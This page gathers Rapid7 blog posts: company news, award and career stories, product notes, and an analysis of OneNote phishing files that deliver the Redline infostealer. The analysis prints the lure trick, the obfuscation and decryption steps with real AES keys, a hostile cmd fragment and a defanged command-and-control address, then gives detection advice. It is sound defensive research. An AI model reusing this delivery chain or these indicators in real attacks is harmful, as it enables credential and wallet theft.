All posts by Rapid7

A Customer Success Manager’s Journey to Cybersecurity

Post Syndicated from Rapid7 original

A Customer Success Manager’s Journey to Cybersecurity

Originally planning to pursue a career in sports journalism, Blake Walters joined Rapid7 ready to roll up his sleeves and learn about an entirely new field—cybersecurity. Walters always had an interest in computer engineering. However, he craved the ability to connect with people and build relationships instead of working deep within coding.

Walters is a learner by nature and is not afraid to take on new challenges or face new risks. Living by the mindset, “If I don’t know, I will work to figure it out,” he began his journey as a recruiter in the technology space. This gave him a great opportunity to learn more about how software is built, which eventually led him to Customer Success, where he could build relationships with customers and help others.

Walters had his first personal brush with cybersecurity when a client he was working with, a small hospital, got hit with Wannacry ransomware in 2017. He became even more curious about cybersecurity as he witnessed firsthand the impact it had on his client.

A Customer Success Manager’s Journey to Cybersecurity

“You know what cybersecurity is and you know people get hacked all the time, but unless you are in it, you don’t realize the ins and outs of what that impact is,” he said. “There were 4-5 weeks where they couldn’t access hospital records, patient information, company files, ANYTHING. That’s a big challenge for a small hospital, or any company.”

From there, the stars aligned, and Walters was approached with an opportunity to join Rapid7. He noted that during his interview there was less emphasis on having a vast amount of cybersecurity knowledge. Instead, the focus was on his ability to build relationships and proactively use the resources provided by Rapid7 to build the industry knowledge needed to be successful in the role.

According to Walters, joining Rapid7 felt like he had finally found a place where he could do what he loved, while being supported in continuing to learn a new industry and grow his career.

“With cybersecurity, it doesn’t matter what you did yesterday. Hackers are changing all the time. If we aren’t also helping our customers evolve and improve their security over time, we are doing them a disservice,” he said. “That’s why Customer Success is so important. It doesn’t matter how good you’ve been in the past, it’s about how good you’re going to be moving forward. That is an exciting and motivating mindset to have.”

One of the biggest misconceptions about cybersecurity is that you need to have specific knowledge to break into the field. According to Walters, that was not his experience.  

Everyone has a day 1. You don’t wake up with knowledge of cybersecurity products,” he said. “If you are trying to break into the field, just start reading. There is plenty of information out there. Learn the basics, and then as you’re looking at companies and jobs, start tailoring your understanding of what that company does.”

In an environment where things change so rapidly, it is integral to have an open mind and willingness to adapt. In regard to Rapid7 specifically, Walters believes diversity is key to the company’s success.

“Having different types of people and backgrounds in an organization has a huge impact. It keeps you out of groupthink and lets people collaborate for a common good,” he said. “At Rapid7, that stood out to me early in the interview process. Everyone is challenging one another to be better. That’s what I was looking for in a company regardless of what industry or business it was.”

Overall, Walters wants others out there thinking about entering the cybersecurity space to know that with some effort, you can make it happen. Even without a technical background.

“Don’t be afraid to push yourself outside your comfort zone. I came into this with no cyber experience. It shows the ability of Rapid7 to take a risk on people who are willing to come in, devote themselves to learning and growth, put in the work, and make an impact,” he said. “It’s not about just finding a job, it’s about finding a home.”

To learn more about opportunities available at Rapid7, visit:

Rapid7 Observes Use of Microsoft OneNote to Spread Redline Infostealer Malware

Post Syndicated from Rapid7 original

Rapid7 Observes Use of Microsoft OneNote to Spread Redline Infostealer Malware

Author: Thomas Elkins
Contributors: Andrew Iwamaye, Matt Green, James Dunne, and Hernan Diaz

Rapid7 routinely conducts research into the wide range of techniques that threat actors use to conduct malicious activity. One objective of this research is to discover new techniques being used in the wild, so we can develop new detection and response capabilities.

Recently, we (Rapid7) observed malicious actors using OneNote files to deliver malicious code. We identified a specific technique that used OneNote files containing batch scripts, which upon execution started an instance of a renamed PowerShell process to decrypt and execute a base64 encoded binary. The base64 encoded binary subsequently decrypted a final payload, which we have identified to be either Redline Infostealer or AsyncRat.

This blog post walks through analysis of a OneNote file that delivered a Redline Infostealer payload.

Analysis of OneNote File

The attack vector began when a user was sent a OneNote file via a phishing email. Once the OneNote file was opened, the user was presented with the option to “Double Click to View File” as seen in Figure 1.

Rapid7 Observes Use of Microsoft OneNote to Spread Redline Infostealer MalwareFigure 1 – OneNote file "Remittance" displaying the button “Double Click to View File”

We determined that the button “Double Click to View File” was moveable. Hidden underneath the button, we observed five shortcuts to a batch script, nudm1.bat. The hidden placement of the shortcuts ensured that the user double-clicked on one of the shortcuts when interacting with the “Double Click to View File” button.

Rapid7 Observes Use of Microsoft OneNote to Spread Redline Infostealer MalwareFigure 2 – Copy of Batch script nudm1.bat revealed after moving “Double Click to View File” button

Once the user double clicked the button “Double Click to View File”, the batch script nudm1.bat executed in the background without the user’s knowledge.

Analysis of Batch Script

In a controlled environment, we analyzed the batch script nudm1.bat and observed variables storing values.

Rapid7 Observes Use of Microsoft OneNote to Spread Redline Infostealer MalwareFigure 3 – Beginning contents of nudm1.bat

Near the middle of the script, we observed a large section of base64 encoded data, suggesting at some point, the data would be decoded by the batch script.

Rapid7 Observes Use of Microsoft OneNote to Spread Redline Infostealer MalwareFigure 4 – Base64 encoded data contained within nudm1.bat

At the bottom of the batch script, we observed the declared variables being concatenated. To easily determine what the script was doing, we placed echo commands in front of the concatenations. The addition of the echo commands allowed for the batch script to deobfuscate itself for us upon execution.

Rapid7 Observes Use of Microsoft OneNote to Spread Redline Infostealer MalwareFigure 5 – echo command placed in front of concatenated variables

We executed the batch file and piped the deobfuscated result to a text file. The text file contained a PowerShell script that was executed with a renamed PowerShell binary, nudm1.bat.exe.

Rapid7 Observes Use of Microsoft OneNote to Spread Redline Infostealer MalwareFigure 6 – Output after using echo reveals PowerShell script

We determined the script performed the following:

  • Base64 decoded the data stored after :: within nudm1.bat, shown in Figure 4

  • AES Decrypted the base64 decoded data using the base64 Key 4O2hMB9pMchU0WZqwOxI/4wg3/QsmYElktiAnwD4Lqw= and base64 IV of TFfxPAVmUJXw1j++dcSfsQ==

  • Decompressed the decrypted contents using gunzip

  • Reflectively loaded the decrypted and decompressed contents into memory

Using CyberChef, we replicated the identified decryption method to obtain a decrypted executable file.

Rapid7 Observes Use of Microsoft OneNote to Spread Redline Infostealer MalwareFigure 7 – AES decryption via Cyberchef reveals MZ header

We determined the decrypted file was a 32-bit .NET executable and analyzed the executable using dnSpy.

Analysis of .NET 32-bit Executable

In dnSpy we observed the original file name was tmpFBF7. We also observed that the file contained a resource named payload.exe.

Rapid7 Observes Use of Microsoft OneNote to Spread Redline Infostealer MalwareFigure 8 – dnSpy reveals name of original program tmpFBF7 and a payload.exe resource

We navigated to the entry point of the file and observed base64 encoded strings. The base64 encoded strings were passed through a function SRwvjAcHapOsRJfNBFxi. The function SRwvjAcHapOsRJfNBFxi utilized AES decryption to decrypt data passed as argument.

Rapid7 Observes Use of Microsoft OneNote to Spread Redline Infostealer MalwareFigure 9 – AES Decrypt Function SRwvjAcHapOsRJfNBFxi

As seen in Figure 9, the function SRwvjAcHapOsRJfNBFxi took in 3 arguments: input, key and iv.

We replicated the decryption process from the function SRwvjAcHapOsRJfNBFxi using CyberChef to decrypt the values of the base64 encoded strings. Figure 9 shows an example of the decryption process of the base64 encoded string vYhBhJfROLULmQk1P9jbiqyIcg6RWlONx2FLYpdRzZA= from line 30 of Figure 7 to reveal a decoded and decrypted string of CheckRemoteDebuggerPresent.

Rapid7 Observes Use of Microsoft OneNote to Spread Redline Infostealer MalwareFigure 10 – Using Cyberchef to replicate decryption of function SRwvjAcHapOsRJfNBFxi

Repeating the decryption of the other base64 encoded strings revealed some anti-analysis and anti-AV checks performed by the executable:

  • IsDebuggerPresent CheckRemoteDuggerPresent AmsiScanBuffer

Other base64 encoded strings include:

  • EtwEventWrite /c choice /c y /n /d y /t 1 & attrib -h -s

After passing the anti-analysis and anti-AV checks, the executable called upon the payload.exe resource in line 94 of the code. We determined that the payload.exe resource was saved into the variable @string.

Rapid7 Observes Use of Microsoft OneNote to Spread Redline Infostealer MalwareFigure 11 – @string storing payload.exe

On line 113, the variable @string was passed into a new function, aBTlNnlczOuWxksGYYqb, as well as the AES decryption function SRwvjAcHapOsRJfNBFxi.

Rapid7 Observes Use of Microsoft OneNote to Spread Redline Infostealer MalwareFigure 12 – @string being passed through function hDMeRrMMQVtybxerYkHW

The function aBTlNnlczOuWxksGYYqb decompressed content passed to it using Gunzip.

Rapid7 Observes Use of Microsoft OneNote to Spread Redline Infostealer MalwareFigure 13 – Function aBTlNnlczOuWxksGYYqb decompresses content using Gzip

Using CyberChef, we decrypted and decompressed the payload.exe resource to obtain another 32-bit .NET executable, which we named payload2.bin. Using Yara, we scanned payload2.bin and determined it was related to the Redline Infostealer malware family.

Rapid7 Observes Use of Microsoft OneNote to Spread Redline Infostealer MalwareFigure 14 – Yara Signature identifying payload2.bin as Redline Infostealer

We also analyzed payload2.bin in dnSpy.

Analysis of Redline Infostealer

We observed that the original final name of payload2.bin was Footstools and that a class labeled Arguments contained the variables IP and Key. The variable IP stored a base64 encoded value GTwMCik+IV89NmBYISBRLSU7PlMZEiYJKwVVUg==.

Rapid7 Observes Use of Microsoft OneNote to Spread Redline Infostealer MalwareFigure 15 – Global variable IP set as Base64 encoded string

The variable Key stored a UTF8 value of Those.

Rapid7 Observes Use of Microsoft OneNote to Spread Redline Infostealer MalwareFigure 16 – Global variable Key set with value Those

We identified that the variable IP was called into a function, WriteLine(), which passed the variables IP and Key into a String.Decrypt function as arguments.

Rapid7 Observes Use of Microsoft OneNote to Spread Redline Infostealer Malware Figure 17 – String.Decrypt being passed arguments IP and Key

The function String.Decrypt was a simple function that XOR’ed input data with the value of Key.

Rapid7 Observes Use of Microsoft OneNote to Spread Redline Infostealer MalwareFigure 18 – StringDecrypt utilizing XOR decryption

Using Cyberchef, we replicated the String.Decrypt function for the ‘IP’ variable by XORing the base64 value shown in Figure 13 with the value of Key shown in Figure 16 to obtain the decrypted value for the IP variable, 172.245.45[.]213:3235.

Rapid7 Observes Use of Microsoft OneNote to Spread Redline Infostealer MalwareFigure 19 – Using XOR in Cyberchef to reveal value of argument IP

Redline Info Stealer has the capability to steal credentials related to Cryptocurrency wallets, Discord data, as well as web browser data including cached cookies. Figure 19 shows functionality in Redline Infostealer that searches for known Cryptocurrency wallets.

Rapid7 Observes Use of Microsoft OneNote to Spread Redline Infostealer MalwareFigure 20 – Redline Infostealer parsing for known Cryptocurrency wallet locations

Rapid7 Protection

Rapid7 has existing rules that detect the behavior observed within customers environments using our Insight Agent including:

Suspicious Process – Renamed PowerShell

OneNote Embedded File Parser

Rapid7 has also developed a OneNote file parser and detection artifact for Velociraptor. This artifact can be used to detect or extract malicious payloads like the one discussed in this post.

Rapid7 Observes Use of Microsoft OneNote to Spread Redline Infostealer Malware


Filename – SHA1 HASH
Rem – 61F9DBE256052D6315361119C7B7330880899D4C
Nudm1.bat – ADCE7CA8C1860E513FB70BCC384237DAE4BC9D26
tmpFBF7.tmp – F6F1C1AB9743E267AC5E998336AF917632D2F8ED
Footstools.exe – 6c404f19ec17609ad3ab375b613ea429e802f063
IP Address – 172.245.45[.]213

MITRE Attack Techniques

TA0002 – Execution

TA0005 – Defense Evasion

TA0006 – Credential Access

TA0007 – Discovery

TA0009 – Collection

TA0011 – Command and Control


Block .one attachments at the network perimeter or with an antiphishing solution if .one files are not business-critical
User awareness training
If possible, implement signatures to search for PowerShell scripts containing reverse strings such as gnirtS46esaBmorF
Watch out for OneNote as the parent process of cmd.exe executing a .bat file

The High Cost of Human Error In OT Systems

Post Syndicated from Rapid7 original

The High Cost of Human Error In OT Systems

In baseball, a mistake made by a player that could have easily been avoided is sometimes called an “unforced error.” An unforced error is not an official error (that is, they are not reflected in statistics), however, they can result in additional runs being scored, runners getting on base, and even games being lost. This applies in cyber security, as well. Threat actors use all sorts of nefarious tactics to target your networks, but they usually can’t succeed without some mistakes from your team.

Rapid7’s partner SCADAfence recently commissioned a survey of 3500 OT professionals. Among the findings, nearly 80% of respondents believe that human error presents the greatest risk for compromise to operational technology (OT) control systems. The survey also found that 83% of respondents believe that there is a significant shortfall in the number of skilled workers. This could contribute to the problem, since under-qualified or improperly trained security workers are more likely to make preventable errors.

Still, many organizations continue to ignore the extremely high potential costs of human error.

Real World Consequences

Last year, SCADAfence argued that an explosion at the Freeport LNG natural gas plant, which a Russian group claimed responsibility for, was actually caused by human error. The timing of the explosion, less than two months after a major maintenance upgrade, and several other factors appear to indicate that improper procedures and a lapse in adherence to company policies were the cause. This was later confirmed by the U.S. Pipeline and Hazardous Materials Safety Administration (PHMSA).

Another example is the Oldsmar Water Facility Attack in 2021. According to reports, human error played a large factor in the attack—in which hackers gained unauthorized access to the water facility’s industrial control system (ICS) network and increased sodium hydroxide content in drinking water to poisonous levels. The Oldsmar facility was using Windows 7, even though Microsoft had stopped supporting it a year earlier. All of Oldsmar’s employees shared the same password to access TeamViewer, a remote access software. And, the facility was connected directly to the internet without any type of firewall protection installed. All of these easily preventable factors contributed to the attacker’s ability to gain access to the facility.

Human error in OT systems can take different forms. As stated above, weak, outdated or duplicated passwords have led to any number of cyber security breaches. Firewalls, which are relied on to provide a first line of OT cyber security defense, are frequently misconfigured or improperly deployed by IT staff members. Finally, phishing attacks, a form of social engineering used by malicious actors to gain information from unwitting victims which is then used to access secure systems, are a major starting point for attacks on critical infrastructure.

Rapid7’s Advice

The number one way to prevent human error from leading to costly cyber attacks is training. OT and IT staff should be regularly trained on company security policies and should understand the importance of always following protocol. Also, teams need to work closely together to ensure that proper protections are in place across the network.

There are a number of best practices that have been shown to reduce the frequency and severity of cyber attacks in OT and ICS networks. Organizations should:

  • Require secure passwords that are changed on a regular schedule. Never allow team members to share passwords or access IDs to systems. Each employee that requires access to a system or device should have a unique user name and account.
  • Reduced access privilege access
  • Keep your network updated with important patches and upgrades
  • Make sure the tools your teams rely on are reliable, effective, and up to date.
  • Stay on top of news and information about newly discovered vulnerabilities, and potential threats relevant to your organization.

Finally, if your team lacks bandwidth or necessary skills, consider using managed services to gain insights and relevant threat information about your network.

This article was written in partnership with SCADAfence.

Rapid7 Added to Carahsoft GSA Schedule Contract

Post Syndicated from Rapid7 original

Rapid7 Added to Carahsoft GSA Schedule Contract

We are happy to announce that Rapid7 has been added to Carahsoft’s GSA Schedule contract, making our suite of comprehensive security solutions widely available to Federal, State, and Local agencies through Carahsoft and its reseller partners.

“With the ever-evolving threat landscape, it is important that the public sector has the resources to defend against sophisticated cyber attacks and vulnerabilities,” said Alex Whitworth, Sales Director who leads the Rapid7 Team at Carahsoft.

“The addition of Rapid7’s cloud risk management and threat detection solutions to our GSA Schedule gives Government customers and our reseller partners expansive access to the tools necessary to protect their critical infrastructure.”

With the GSA contract award, Rapid7 is able to significantly expand its availability to Federal, State, Local, and Government markets. In addition to GSA, Rapid7 was recently added to the Department of Homeland Security (DHS) Continuous Diagnostics Mitigation’s Approved Products List.

“As the attack surface continues to increase in size and complexity, it’s imperative that all organizations have access to the tools and services they need to monitor risk across their environments,” said Damon Cabanillas, Vice President of Public Sector Sales at Rapid7.

“This contract award is a massive step forward for Rapid7 as we work to further serve the public sector.”

Rapid7 is available through Carahsoft’s GSA Schedule No. 47QSWA18D008F. For more information on Rapid7’s products and services, contact the Rapid7 team at Carahsoft at R[email protected].

Rapid7 Now Available Through Carahsoft’s NASPO ValuePoint

Post Syndicated from Rapid7 original

Rapid7 Now Available Through Carahsoft’s NASPO ValuePoint

We are happy to announce that Rapid7’s solutions have been added to the NASPO ValuePoint Cloud Solutions contract held by Carahsoft Technology Corp. The addition of this contract enables Carahsoft and its reseller partners to provide Rapid7’s Insight platform to participating States, Local Governments, and Educational (SLED) institutions.

“Rapid7’s Insight platform goes beyond threat detection by enabling organizations to quickly respond to attacks with intelligent automation,” said Alex Whitworth, Sales Director who leads the Rapid7 Team at Carahsoft.

“We are thrilled to work with Rapid7 and our reseller partners to deliver these advanced cloud risk management and threat detection solutions to NASPO members to further protect IT environments across the SLED space.”

NASPO ValuePoint is a cooperative purchasing program facilitating public procurement solicitations and agreements using a lead-state model. The program provides the highest standard of excellence in public cooperative contracting. By leveraging the leadership and expertise of all states and the purchasing power of their public entities, NASPO ValuePoint delivers the highest valued, reliable and competitively sourced contracts, offering public entities outstanding prices.

“In partnership with Carahsoft and their reseller partners, we look forward to providing broader availability of the Insight platform to help security teams better protect their organizations from an increasingly complex and volatile threat landscape,” said Damon Cabanillas, Vice President of Public Sector Sales at Rapid7.

The Rapid7 Insight platform is available through Carahsoft’s NASPO ValuePoint Master Agreement #AR2472. For more information, visit

Cloud Security and Compliance Best Practices: Highlights From The CSA Cloud Controls Matrix

Post Syndicated from Rapid7 original

Cloud Security and Compliance Best Practices: Highlights From The CSA Cloud Controls Matrix

In a recent blog post, we highlighted the release of an InsightCloudSec compliance pack, that helps organizations establish and adhere to AWS Foundational Security Best Practices. While that’s a great pack for those who have standardized on AWS and are looking for a trusted set of controls to harden their environment, we know that’s not always the case.

In fact, depending on what report you read, the percentage of organizations that have adopted multiple cloud platforms has soared and continues to rise exponentially. According to Gartner, by 2026 more than 90% of enterprises will extend their capabilities to multi-cloud environments, up from 76% in 2020.

It can be a time- and labor-intensive process to establish and enforce compliance standards across single cloud environments, but this becomes especially challenging in multi-cloud environments. First, the number of required checks and guardrails are multiplied, and second, because each platform is unique,  proper hygiene and security measures aren’t consistent across the various clouds. The general approaches and philosophies are fairly similar, but the way controls are implemented and the way policies are written can be significantly different.

For this post, we’ll dive into one of the most commonly-used cloud security standards for large, multi-cloud environments: the CSA Cloud Controls Matrix (CCM).

What is the CSA Cloud Controls Matrix?

In the unlikely event you’re unfamiliar, Cloud Security Alliance (CSA) is a non-profit organization dedicated to defining and raising awareness of best practices to help ensure a secure cloud computing environment. CSA brings together a community of cloud security experts, industry practitioners, associations, governments, and its corporate and individual members to offer cloud security-specific research, education, certification, events and products.

The Cloud Controls Matrix is a comprehensive cybersecurity control framework for cloud computing developed and maintained by CSA. It is widely-used as a systematic assessment of a cloud implementation and provides guidance on which security controls should be implemented within the cloud supply chain. The controls framework is aligned to the CSA Security Guidance for Cloud Computing and is considered a de-facto standard for cloud security assurance and compliance.

Five CSA CCM Principles and Why They’re Important

The CCM consists of many controls and best practices, which means we can’t cover them all in a single blog post. That said, we’ve outlined 5 major principles that logically group the various controls and why they’re important to implement in your cloud environment. Of course, the CCM provides a comprehensive set of specific and actionable directions that, when adopted, simplify the process of adhering to these principles—and many others.

Ensure consistent and proper management of audit logs
Audit logs record the occurrence of an event along with supporting metadata about the event, including the time at which it occurred, the responsible user or service, and the impacted entity or entities. By reviewing audit logs, security teams can investigate breaches and ensure compliance with regulatory requirements. Within CCM, there are a variety of controls focused on ensuring that you’ve got a process in place to collect, retain and analyze logs as well as limiting access and the ability to edit or delete such logs to only those who need it.

Ensure consistent data encryption and proper key management
Ensuring that data is properly encrypted, both at rest and in transit, is a critical step to protect your organization and customer data from unauthorized access. There are a variety of controls within the CCM that are centered around ensuring that data encryption is used consistently and that encryption keys are maintained properly—including regular rotation of keys as applicable.

Effectively manage IAM permissions and abide by Least Privilege Access (LPA)
In modern cloud environments, every user and resource is assigned a unique identity and a set of access permissions and privileges. This can be a challenge to keep track of, especially at scale, which can result in improper access, either from internal users or external malicious actors. To combat this, the CCM provides guidance around establishing processes and mechanisms to manage, track and enforce permissions across the organization. Further, the framework suggests employing the Least Privilege Access (LPA) principle to ensure users only have access to the systems and data that they absolutely need.

Establish and follow a process for managing vulnerabilities
There are a number of controls focused on establishing, implementing and evaluating processes, procedures and technical measures for detecting and remediating vulnerabilities. The CCM has dedicated controls for application vulnerabilities, external library vulnerabilities and host-level vulnerabilities. It is important to regularly scan your cloud environments for known vulnerabilities, and evaluate the processes and methodologies you use to do so, as well.

Define a process to proactively roll back changes to a previous state of good
In traditional, on-premises environments, patching and fixing existing resources is the proper course of action when an error or security concern is discovered. Conversely, when things go awry in cloud environments, remediation steps typically involve reverting back to a previous state of good. To this end, the CCM guides organizations to proactively establish and implement a process  that allows them to easily roll back changes to a previously known good state—whether manually or via automation.

How InsightCloudSec Helps Implement and Enforce CCM

InsightCloudSec allows security teams to establish and continuously measure compliance against organizational policies, whether they’re based on common industry frameworks or customized to specific business needs. This is accomplished through the use of compliance packs.

A compliance pack within InsightCloudSec is a set of checks that can be used to continuously assess your cloud environments for compliance with a given regulatory framework or industry best practices. The platform comes out-of-the-box with 30+ compliance packs, and also offers the ability to build custom compliance packs that are completely tailored to your business’ specific needs.

Whenever a non-compliant resource is created, or when a change is made to an existing resource’s configuration or permissions, InsightCloudSec will detect it within minutes. If you so choose, you can make use of the platform’s native, no-code automation to remediate the issue—either via deletion or by adjusting the configuration and/or permissions—without any human intervention.

If you’re interested in learning more about how InsightCloudSec can help implement and enforce security and compliance standards across your organization, be sure to check out a free demo!

James Alaniz and Ryan Blanchard contributed to this article.

[The Lost Bots] S02E06: Play “Experts or Scuttlebutt?” With Us

Post Syndicated from Rapid7 original

[The Lost Bots] S02E06: Play “Experts or Scuttlebutt?” With Us

As the year winds down, Jeffrey Gardner, Detection and Response Practice Advisor and Stephen Davis, Lead D&R Sales Technical Advisor, collected predictions that were made for 2022, and new ones for 2023. Then, they asked their Rapid7 colleagues to decide if the prediction was made by a cybersecurity expert—or if it was scuttlebutt from, say, Reddit. It’s more interesting than a simple true and false game and appropriate in a world where you need to keep your ear to the ground but be wary of what you hear at the same time.

Play along and see if you beat our winner.

The episode ends with a quick game of “Never Have I Ever.” While some revelations are a bit embarrassing, it’s all safe for work and safe for the kiddies. (You won’t believe who got phished.)

Enjoy your holidays and see you next year.

Additional reading:

Rapid7 Recognized as a Top Place to Work in for 11th Consecutive Year

Post Syndicated from Rapid7 original

Rapid7 Recognized as a Top Place to Work in for 11th Consecutive Year

On November 30th, 2022, Rapid7 was again recognized by The Boston Globe as a Top Place to Work in Massachusetts. This marks the 11th consecutive year Rapid7 has made the list, this time coming in at #3 in the large company category. Top Places to Work rankings are based on a Globe survey that measures worker opinions about their company’s direction, management, pay and benefits, culture, engagement, and more.

Christina Luconi, Chief People Officer at Rapid7, is proud that the company has maintained such a consistent place in one of the most prestigious workplace award programs in the region—especially as the company has grown and scaled over more than a decade.

“We started participating when Rapid7 had less than 100 employees. Since then, we’ve scaled the size categories from small, to medium, to large, and still maintained that ‘great place to work’ status,” she said. “Today, we have nearly 2,700 people in offices around the world, with 735 in our Boston headquarters.”

Luconi believes it’s more than office perks that keep people engaged and ensure long term company success. “The companies that stand the test of time as truly amazing places to work are those that unite employees around a shared mission of customer success,” she said. “From there, these organizations are able map their business strategy back to an environment where their people are inspired, motivated, and thrive.”

To create an environment that fosters innovation and success, Rapid7’s people development team empowers employees to take ownership of their career trajectory and goals. This includes programs at every stage of the employee lifecycle, from onboarding to management and leadership positions.

“Rapid7’s strong sense of core values, impactful company mission, and alignment between business and people strategy is what makes the company special,” said Luconi.

For more information about working at Rapid7, please visit our careers page.

AWS Graviton Processor Support on Insight Agent

Post Syndicated from Rapid7 original

AWS Graviton Processor Support on Insight Agent

By Marco Botros

Marco is a Technical Product Manager for Platform at Rapid7.

We are pleased to announce that the Insight Agent now supports the AWS Graviton processor. The Insight Agent supports various operating systems using the AWS Graviton processor, including Amazon Linux, Redhat, and Ubuntu. The full list of supported operating systems can be found in our documentation.

AWS first introduced its ARM-based server processor — Graviton — in 2018. It has since released Graviton2 in 2020 and Graviton3 in May of 2022. The Graviton3 Processor has a 25% better compute performance and uses up to 60% less energy than the Graviton2 Processor. Besides supporting Linux on the Graviton Processor, we will continue to support it on both 32-bit and 64-bit intel processors. However, you will only be able to see the new Graviton installer if your organization’s agents are not pinned or, if they have been pinned, are on an agent version higher than 3.2.0. The new Linux installer is called ``, and the intel-based Linux installer has been renamed to `` (from just ``).

You can find more information on how to download and install the new Linux ARM Installer from the download section of Agent Management in the platform:

AWS Graviton Processor Support on Insight Agent

You can also use the Agent Test Set feature to roll out the new agent on a select set of machines before deploying it widely.

Search Made Easy: InsightIDR’s Secret Weapon for Efficiency and Efficacy

Post Syndicated from Rapid7 original

Search Made Easy: InsightIDR’s Secret Weapon for Efficiency and Efficacy

By Matt Heidet

Matt is a Senior Information Security Engineer at a Regional Financial Institution. He is a Customer and Guest Blogger for Rapid7

Have you ever groaned when divvying up incidents from a pen-test amongst an overworked team? Or maybe you’ve struggled to present how you adhere to multiple compliance frameworks to your board. As a Senior Information Security Engineer at a Regional Finance Institute, I’m all too familiar with the daily grind – too many threats, not nearly enough time. Fortunately, Rapid7’s InsightIDR has helped me and my team unify our data, verify the nature of threats, and uphold a security posture that we’re confident in.

InsightIDR has lots of features that have enabled my organization to identify and respond more easily to threats. In this blog post, I’m going to share some insight into my favorite – InsightIDR’s Log Search function.

Back to the Beginning: Why We Chose Rapid7

Choosing InsightIDR was a no-brainer for us. We tried two other products, but as soon as we finished the proof-of-concept with Rapid7, we went straight to purchase. There was no point in even testing the others, as InsightIDR provided us with the visibility and context necessary to keep our environment secure

If you already have InsightVM, Rapid7’s vulnerability management solution, it’s a pretty smooth transition to InsightIDR. As existing InsightVM users, we already had the Rapid7 Insight Agent deployed on our endpoints, which provided us with real-time endpoint monitoring for vulnerabilities. When we added InsightIDR to our environment, we were automatically covered on those same endpoints, without any need to set up anything additional.

We were able to get up and running and integrate with a number of Azure Event Hubs out of the gate (a centralized service from which to collect Azure data and logs). Only a few other tools would provide that same capability – but they wouldn’t fit into our existing environment the way that Rapid7 did.

When we first started using InsightIDR, my team wanted to bring in as much data to InsightIDR as we could to get a clear picture of what was happening in our environment. We knew we needed holistic visibility, but weren’t 100% on what we should be alerting on or necessarily looking for. Luckily, InsightIDR’s Log Search intuitively organized all of our data and helped us get a view of everything in one place, narrowing our focus and enabling us to really focus on high priority data.

InsightIDR removed the complexity of traditional Log Search. If you’re not sure where to start, just start with a simple search – a host name, a kind of attack, or an event. Then, based on your results, you can create a more advanced search by filtering, iterating, or narrowing down your simple searches. From there, you can start creating reports. Your reports can tell you (and you can then customize) how you should be watching an endpoint, how you should be alerted, and more.

Let’s Talk Outcomes

Now it’s time to do something with all this data! We were able to compare data from those sources to the email alerts that we got from Microsoft on Azure and easily generate a report based on the email events we were seeing from Microsoft. From there, we were able to generate custom detections.

One reason this was all so straightforward is that Rapid7’s powerful search language, Log Entry Query Language (LEQL – which allows you to construct queries that can extract the hidden insights within your logs), is easy to pick up. Even if you’re not a programmer or engineer, the structure and syntax of the language are accessible.

Once you get the first couple workflows ironed out, it’s easy to extrapolate to other ones. Once my team focused on this task we were able to come up with 45 custom detections over just three days!

Where Do I Go From Here?

Detections are your bread and butter, of course. But once you’re oriented to the dashboard, the language, and the basics of a workflow, the sky’s the limit. You can then customize your reports to your heart’s desire. My team currently has about 22 reports coming in daily, summarizing almost 100 custom detections that all stem from log search.

Rapid7’s alerting and reporting is hands down the best I’ve ever worked with. But it’s not just about volume – it’s also about versatility. We’re able to monitor all of our Cloud services – including Amazon, Azure, and Google – with ease. In the past, when using managed security providers, this wasn’t nearly as straightforward. We’re looking at InsightIDR’s pre-built Attacker Behavior Analytics (ABA) and User Behavior Analytics (UBA) detections with regularity, using a mix of both custom and pre-built “cards” (a visually appealing representation of data) in our InsightIDR dashboard.

Furthermore, it’s not just that you have options. The pre-built detections that InsightIDR ships out of the box boasts plenty of efficacy, resulting in unprecedented efficiency. The ability to have all of the data you need in one place – the equivalent of a “single pane of glass” – just can’t be overstated.

Rapid7 Takes Home 2 Awards and a Highly Commended Recognition at the 2022 Belfast Telegraph IT Awards

Post Syndicated from Rapid7 original

Rapid7 Takes Home 2 Awards and a Highly Commended Recognition at the 2022 Belfast Telegraph IT Awards

Rapid7 was honored at the Belfast Telegraph’s annual IT Awards, Friday, taking home a pair of awards including the coveted “Best Place to Work in IT” in the large company category award, and the “Cyber Security Project of the Year” award, for groundbreaking machine learning research in application security. That research was conducted in collaboration with The Centre for Secure Information Technologies (CSIT) at Queen’s University Belfast.

The team also took home a Highly Commended recognition for Best Use of Cloud services at the event.

Rapid7 Takes Home 2 Awards and a Highly Commended Recognition at the 2022 Belfast Telegraph IT Awards

The ability to work on meaningful projects that positively impact customers, being supported by a range of professional development opportunities, a culture rooted in connection and collaboration, and the invitation to explore new ways of thinking all came together in the submission to help earn them the “Best Place to Work” title.

Belfast has been regarded as one of the UK’s fastest growing technology hubs. There are now more than 300,000 people working in the technology sector of Northern Ireland, according to the Telegraph. For Rapid7, an impressive business environment and the work being done in IT Security at the local universities were significant factors in the decision to join the Belfast community in 2014. This move was in line with Rapid7’s goal of creating exceptional career experiences for their people and expanding operations to address a growing global customer base. In 2021, Rapid7 relocated to their newest office space and announced the addition of more than 200 new roles to the region.

Rapid7’s win for Cybersecurity Project of the Year focused on the cutting-edge area of machine learning in application security. Their research sought to reduce the high level of false positives generated by vulnerability scanners — a pain point that has become all too common in today’s digital environment. Rapid7’s multi-disciplinary Machine Learning (ML) team in Belfast was able to create a way to automatically prioritize real vulnerabilities and reduce false positive friction for customers. Their work has been peer-reviewed by industry experts, published in academic journals, and accepted for presentation at AISEC’s November 2022 event — where it was recognized with their “Best Paper Award.” AISEC is the leading venue for ML cybersecurity innovations.

Rapid7 Takes Home 2 Awards and a Highly Commended Recognition at the 2022 Belfast Telegraph IT Awards

Rounding out the evening was a Highly Commended recognition from the Telegraph for “Best Use of Cloud Services.” The scale and speed of cloud adoption over the last number of years has caused an exponential growth in complex security challenges. Rapid7 showcased how their team in Belfast partnered with global colleagues to create an innovative and multi-faceted solution to manage Cloud Identity Risk across three major Cloud Service Providers (CSPs) — AWS, Azure and GCP. Their work has created a positive impact on Rapid7 customers by enabling secure cloud adoption faster than ever before.

Rapid7 is a company that is firmly rooted in their company values. Employees are encouraged to challenge conventional ways of thinking, work together to create impact, be advocates for customers, bring their authentic selves and experiences to the table, and embrace the spirit of continuous learning and growth. The work represented in these awards is a testament to the incredible opportunities and experiences that are possible when these values are clearly modeled, celebrated and practiced in pursuit of a shared mission — creating a safer digital future for all.

For more information about working at Rapid7, check out

For more information on the Belfast Telegraph IT Awards and other winners, click here.

CVE-2022-41622 and CVE-2022-41800 (FIXED): F5 BIG-IP and iControl REST Vulnerabilities and Exposures

Post Syndicated from Rapid7 original

